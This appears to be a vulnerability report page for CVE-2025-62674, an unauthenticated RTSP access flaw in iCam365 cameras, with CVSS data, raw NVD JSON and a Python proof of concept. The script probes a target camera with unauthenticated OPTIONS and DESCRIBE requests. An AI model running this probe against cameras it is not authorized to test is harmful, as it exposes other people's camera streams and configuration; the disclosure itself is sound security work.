Security Vulnerability Report
CVE-2025-62674 CVSS 6.8 MEDIUM

Published: 2025-11-20 21:16:06
Last Modified: 2026-04-15 00:35:42

Description

The affected product allows unauthenticated access to Real Time Streaming Protocol (RTSP) services, which may allow an attacker unauthorized access to camera configuration information.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

iCam365 and related camera products (for specific versions, refer to the vendor's official advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import sys


def rtsp_unauthorized_access(target_ip, port=554):
    """
    CVE-2025-62674 PoC - RTSP Unauthenticated Access
    This script demonstrates unauthorized access to RTSP service
    """
    # Defined before the try block so the finally clause is safe
    # even if socket creation or connect() fails.
    sock = None
    try:
        # RTSP OPTIONS request without authentication
        options_request = f'OPTIONS rtsp://{target_ip}:{port}/stream1 RTSP/1.0\r\n'
        options_request += 'CSeq: 1\r\n'
        options_request += '\r\n'

        # RTSP DESCRIBE request without authentication
        describe_request = f'DESCRIBE rtsp://{target_ip}:{port}/stream1 RTSP/1.0\r\n'
        describe_request += 'CSeq: 2\r\n'
        describe_request += 'Accept: application/sdp\r\n'
        describe_request += '\r\n'

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, port))

        print(f'[*] Sending OPTIONS request to {target_ip}:{port}')
        sock.sendall(options_request.encode())
        response1 = sock.recv(4096).decode('utf-8', errors='ignore')
        print(f'[*] OPTIONS Response:\n{response1}')

        print(f'[*] Sending DESCRIBE request to {target_ip}:{port}')
        sock.sendall(describe_request.encode())
        response2 = sock.recv(8192).decode('utf-8', errors='ignore')
        print(f'[*] DESCRIBE Response:\n{response2}')

        # An empty reply (connection closed) says nothing about authentication,
        # so do not report it as a finding.
        if not response2:
            print('[-] No DESCRIBE response received; result inconclusive')
            return False

        # Check if authentication is required
        if '401' not in response2 and 'Unauthorized' not in response2:
            print('[!] VULNERABLE: RTSP service allows unauthenticated access!')
            return True
        else:
            print('[*] NOT VULNERABLE: Authentication is required')
            return False
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False
    finally:
        if sock is not None:
            sock.close()


if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
        rtsp_unauthorized_access(target, port)
    else:
        print('Usage: python cve-2025-62674.py <target_ip> [port]')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62674", "sourceIdentifier": "[email protected]", "published": "2025-11-20T21:16:05.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The affected product allows unauthenticated access to Real Time Streaming Protocol (RTSP) services, which may allow an attacker unauthorized access to camera configuration information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": 
[{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json", "source": "[email protected]"}, {"url": "https://icam365.net/en/aboutUs/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02", "source": "[email protected]"}]}}